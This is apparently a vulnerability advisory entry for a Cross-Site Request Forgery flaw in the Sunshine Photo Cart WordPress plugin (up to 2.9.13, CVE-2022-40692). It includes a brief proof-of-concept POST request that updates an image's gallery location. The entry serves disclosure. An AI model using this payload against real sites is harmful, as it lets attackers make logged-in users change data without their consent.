Sunshine Photo Cart by WP Sunshine

Sunshine Photo Cart by WP Sunshine <= 2.9.13 - Image Location Update via CSRF

LANACOMMONVDB ID: 2a3952bd-b272-4479-a969-af729f264b7a

The plugin does not have Cross-Site Request Forgery (CSRF) check when updating an image location, which could allow attackers to make logged in users perform such action via a Cross-Site Request Forgery (CSRF) attack.

Proof of Concept

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded

action=sunshine_update_image_location&image_id=1&gallery_id=1

References

Source Code: https://wordpress.org/plugins/sunshine-photo-cart/

CVE: CVE-2022-40692

Attributes

Catgory: WordPress Plugin

Discovered: 2022-09-09

Published: 2022-12-01

Affected Version: <= 2.9.13

Classification

Type: Cross-Site Request Forgery (CSRF)

Researcher

Name: István Márton

Email: [email protected]